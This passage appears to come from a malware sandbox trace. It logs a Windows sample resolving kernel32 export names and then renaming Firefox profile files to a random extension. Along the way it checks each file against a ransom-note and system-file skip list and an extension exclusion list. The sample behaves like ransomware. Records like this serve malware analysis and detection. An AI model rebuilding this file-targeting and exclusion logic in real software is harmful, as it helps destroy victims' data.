(in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0080.837] lstrlenA (lpString="CREATEFILEW") returned 11 [0080.837] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0080.837] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0080.837] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0080.837] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0080.837] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0080.837] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0080.837] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0080.837] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0080.838] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0080.838] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0080.838] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0080.838] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0080.838] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0080.838] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0080.838] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0080.838] lstrlenA (lpString="CREATEJOBSET") returned 12 [0080.838] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0080.838] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0080.838] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0080.838] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0080.838] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0080.838] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0080.838] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0080.838] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0080.838] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0080.838] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0080.838] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0080.838] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0080.838] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0080.838] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0080.838] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0080.838] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0080.838] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0080.838] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0080.838] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0080.838] lstrlenA (lpString="CREATEPIPE") returned 10 [0080.838] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0080.838] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0080.838] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0080.838] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0080.838] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0080.838] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0080.838] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0080.838] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0080.838] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0080.839] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0080.839] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0080.839] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0080.839] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0080.839] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0080.839] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0080.839] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0080.839] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0080.839] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0080.839] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0080.839] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0080.839] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0080.839] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0080.839] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0080.839] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0080.839] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0080.839] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0080.839] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0080.839] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0080.839] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0080.839] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0080.839] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0080.839] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0080.839] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0080.839] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0080.839] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0080.839] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0080.839] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0080.839] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0080.839] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0080.839] lstrlenA (lpString="CREATETHREAD") returned 12 [0080.839] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0080.839] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0080.839] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0080.839] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0080.840] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0080.840] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0080.840] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0080.840] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0080.840] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0080.840] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0080.840] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0080.840] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0080.840] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0080.840] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0080.840] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0080.840] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0080.840] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0080.840] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0080.840] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0080.840] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0080.840] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0080.840] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0080.840] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0080.840] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0080.840] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0080.840] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0080.840] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0080.840] lstrlenA (lpString="CTRLROUTINE") returned 11 [0080.840] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0080.840] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0080.840] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0080.840] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0080.840] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0080.840] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0080.840] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0080.840] lstrlenA (lpString="DEBUGBREAK") returned 10 [0080.840] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0080.840] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0080.840] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0080.840] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0080.841] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0080.841] lstrlenA (lpString="DECODEPOINTER") returned 13 [0080.841] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0080.841] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0080.841] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0080.841] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0080.841] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0080.841] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0080.841] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0080.841] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0080.841] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0080.841] lstrlenA (lpString="DELETEATOM") returned 10 [0080.841] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0080.841] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0080.841] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0080.841] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0080.841] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0080.841] lstrlenA (lpString="DELETEFIBER") returned 11 [0080.841] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0080.841] lstrlenA (lpString="DELETEFILEA") returned 11 [0080.841] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0080.841] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0080.841] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0080.841] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0080.841] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0080.841] lstrlenA (lpString="DELETEFILEW") returned 11 [0080.841] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0080.841] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0080.841] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0080.841] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0080.841] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0080.841] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0080.841] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0080.841] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0080.841] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0080.842] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0080.842] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0080.842] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0080.842] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0080.842] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0080.842] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0080.842] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0080.842] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0080.842] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0080.842] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0080.842] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0080.842] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0080.842] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0080.842] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0080.842] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0080.842] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0080.842] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0080.842] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0080.842] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0080.842] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0080.842] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0080.842] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0080.842] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0080.842] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0080.842] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0080.842] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0080.842] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0080.842] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0080.842] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0080.842] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0080.842] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0080.842] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0080.842] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0080.842] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0080.842] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0080.842] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0080.842] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0080.843] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0080.843] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0080.843] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0080.843] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0080.843] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0080.843] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0080.843] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0080.843] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0080.843] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0080.843] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0080.843] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0080.843] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0080.843] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0080.843] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0080.843] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0080.843] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0080.843] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0080.843] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0080.843] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0080.843] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0080.843] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0080.843] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0080.843] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite") returned 108 [0080.843] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite.CfNXlP") returned 115 [0080.843] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\content-prefs.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite.CfNXlP" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\content-prefs.sqlite.cfnxlp"), dwFlags=0x0) returned 1 [0080.844] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.844] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.844] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.845] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb5ad4bf0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb5ad4bf0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x83256a10, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="cookies.sqlite", cAlternateFileName="COOKIE~1.SQL")) returned 1 [0080.845] lstrcmpiW (lpString1="cookies.sqlite", lpString2="DECRYPT-FILES.txt") returned -1 [0080.845] lstrcmpiW (lpString1="cookies.sqlite", lpString2="autorun.inf") returned 1 [0080.845] lstrcmpiW (lpString1="cookies.sqlite", lpString2="boot.ini") returned 1 [0080.845] lstrcmpiW (lpString1="cookies.sqlite", lpString2="desktop.ini") returned -1 [0080.845] lstrcmpiW (lpString1="cookies.sqlite", lpString2="ntuser.dat") returned -1 [0080.845] lstrcmpiW (lpString1="cookies.sqlite", lpString2="iconcache.db") returned -1 [0080.845] lstrcmpiW (lpString1="cookies.sqlite", lpString2="bootsect.bak") returned 1 [0080.845] lstrcmpiW (lpString1="cookies.sqlite", lpString2="ntuser.dat.log") returned -1 [0080.845] lstrcmpiW (lpString1="cookies.sqlite", lpString2="thumbs.db") returned -1 [0080.845] lstrcmpiW (lpString1="cookies.sqlite", lpString2="Bootfont.bin") returned 1 [0080.845] lstrlenW (lpString="cookies.sqlite") returned 14 [0080.845] lstrcmpiW (lpString1="sqlite", lpString2="lnk") returned 1 [0080.845] lstrcmpiW (lpString1="sqlite", lpString2="exe") returned 1 [0080.845] lstrcmpiW (lpString1="sqlite", lpString2="sys") returned -1 [0080.845] lstrcmpiW (lpString1="sqlite", lpString2="dll") returned 1 [0080.845] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0080.845] lstrlenW (lpString="cookies.sqlite") returned 14 [0080.845] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0080.845] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="cookies.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS 